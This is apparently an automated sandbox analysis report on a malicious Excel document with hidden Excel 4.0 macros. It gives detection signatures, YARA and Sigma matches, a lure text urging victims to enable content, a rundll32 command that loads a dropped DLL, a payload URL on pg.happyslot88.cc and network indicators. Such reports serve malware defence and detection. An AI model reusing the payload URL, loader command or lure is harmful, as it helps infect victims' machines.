Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Heur.15528.14839

Overview

General Information

Sample Name:SecuriteInfo.com.Heur.15528.14839 (renamed file extension from 14839 to xls)
Analysis ID:356212
MD5:5a75c6184001a6b8785206f1e2121290
SHA1:b3ec9fbcc5e96c45e74d503210a51a7ee5ce8132
SHA256:c71bd3833fbb10cd2f845c83a6ed957f3243990de48a74b4d5cf1602303f4bb1

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2456 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2820 cmdline: rundll32 ..\rieuro.vnt,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Heur.15528.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11da3:$e1: Enable Editing
  • 0x11e18:$e2: Enable Content
SecuriteInfo.com.Heur.15528.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148a2:$s1: Excel
  • 0x15906:$s1: Excel
  • 0x3802:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SecuriteInfo.com.Heur.15528.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2456, ProcessCommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer, ProcessId: 2820

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: SecuriteInfo.com.Heur.15528.xlsVirustotal: Detection: 9%Perma Link

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 139.162.8.120:443 -> 192.168.2.22:49167 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: global trafficDNS query: name: pg.happyslot88.cc
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 139.162.8.120:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 139.162.8.120:443
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: pg.happyslot88.cc
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: SecuriteInfo.com.Heur.15528.xlsString found in binary or memory: https://pg.happyslot88.cc/ds/2202.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownHTTPS traffic detected: 139.162.8.120:443 -> 192.168.2.22:49167 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: SecuriteInfo.com.Heur.15528.xlsInitial sample: EXEC
    Source: SecuriteInfo.com.Heur.15528.xlsOLE indicator, VBA macros: true
    Source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal76.expl.evad.winXLS@3/11@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\12DE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCABD.tmpJump to behavior
    Source: SecuriteInfo.com.Heur.15528.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: SecuriteInfo.com.Heur.15528.xlsVirustotal: Detection: 9%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: SecuriteInfo.com.Heur.15528.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Heur.15528.xls10%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    pg.happyslot88.cc1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://pg.happyslot88.cc/ds/2202.gif2%VirustotalBrowse
    https://pg.happyslot88.cc/ds/2202.gif0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    pg.happyslot88.cc
    139.162.8.120
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpfalse
      high
      http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpfalse
        high
        http://investor.msn.comrundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpfalse
            high
            http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2097683306.0000000001DD7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.com/rundll32.exe, 00000003.00000002.2097521272.0000000001BF0000.00000002.00000001.sdmpfalse
                high
                https://pg.happyslot88.cc/ds/2202.gifSecuriteInfo.com.Heur.15528.xlsfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                139.162.8.120
                unknownNetherlands
                63949LINODE-APLinodeLLCUSfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:356212
                Start date:22.02.2021
                Start time:19:14:16
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 4m 37s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:SecuriteInfo.com.Heur.15528.14839 (renamed file extension from 14839 to xls)
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.evad.winXLS@3/11@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.210, 2.20.142.209
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                • Report size getting too big, too many NtDeviceIoControlFile calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                LINODE-APLinodeLLCUSDrawings2.exeGet hashmaliciousBrowse
                • 45.56.79.23
                Sign-1870635479_637332644.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                Invoice467972.jarGet hashmaliciousBrowse
                • 23.239.31.129
                Invoice467972.jarGet hashmaliciousBrowse
                • 23.239.31.129
                SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                Deposit_50%PAYMENT TERM -PO09-excel.htmGet hashmaliciousBrowse
                • 45.79.77.20
                Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                • 176.58.123.25
                IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
                • 172.104.97.173
                SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                SecuriteInfo.com.Exploit.Siggen3.10048.15397.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                Invoice#6026115.xlsGet hashmaliciousBrowse
                • 172.104.247.192
                index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                • 176.58.123.25
                MT0128.jarGet hashmaliciousBrowse
                • 23.239.31.129
                MT0128.jarGet hashmaliciousBrowse
                • 23.239.31.129
                v.dllGet hashmaliciousBrowse
                • 172.104.247.192
                SecuriteInfo.com.Exploit.Siggen3.10048.426.xlsGet hashmaliciousBrowse
                • 176.58.123.25
                ransomware.exeGet hashmaliciousBrowse
                • 66.228.32.51

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                7dcce5b76c8b17472d024758970a406bSubconract 504.xlsmGet hashmaliciousBrowse
                • 139.162.8.120
                upbck.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                IMG_6078_SCANNED.docGet hashmaliciousBrowse
                • 139.162.8.120
                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                _a6590.docxGet hashmaliciousBrowse
                • 139.162.8.120
                Small Charities.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                quotation10204168.dox.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                notice of arrival.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                22-2-2021 .xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                Shipping_Document.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                Remittance copy.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                CI + PL.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                • 139.162.8.120
                124992436.docxGet hashmaliciousBrowse
                • 139.162.8.120
                document-1900770373.xlsGet hashmaliciousBrowse
                • 139.162.8.120
                AswpCUetE0.docGet hashmaliciousBrowse
                • 139.162.8.120
                EIY2otZ3r8.docGet hashmaliciousBrowse
                • 139.162.8.120
                Invoice.pptGet hashmaliciousBrowse
                • 139.162.8.120
                Invoice.pptGet hashmaliciousBrowse
                • 139.162.8.120
                SecuriteInfo.com.Exploit.Siggen3.10343.28053.xlsGet hashmaliciousBrowse
                • 139.162.8.120

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):893
                Entropy (8bit):7.366016576663508
                Encrypted:false
                SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                Malicious:false
                Reputation:high, very likely benign file
                Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.090852246460564
                Encrypted:false
                SSDEEP:6:kKBsPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:CW3kPlE99SNxAhUeo+aKt
                MD5:0A6D58C6587151522D1A18EDE041E928
                SHA1:FD25FDB89E68ACE622696DF70232758D9F4F73CC
                SHA-256:FD3A019FB17300D9B4EA886C1A360ACD15AD39F941D5F687918948258AF03AE9
                SHA-512:6B2333AC063288AC572E9AA0D59020EE2C2B61B632C45884259338BE9DF709B2E49900809B6509C247722DCA23C64862D9B388C32B7AD21CC1122CA82712A6D3
                Malicious:false
                Reputation:low
                Preview: p...... ........'.......(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):252
                Entropy (8bit):3.0294634724686764
                Encrypted:false
                SSDEEP:3:kkFkl4LsykltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKCnliBAIdQZV7eAYLit
                MD5:87F438332CAC19A282D84CDB699DFE96
                SHA1:8468767CC6288E819AF102485CC75CF9D1ACA45F
                SHA-256:516B17B0C42A5247F7C6CBF1C23FFD1B10DC6C94B9EE2692BD0A6A9487FBAA21
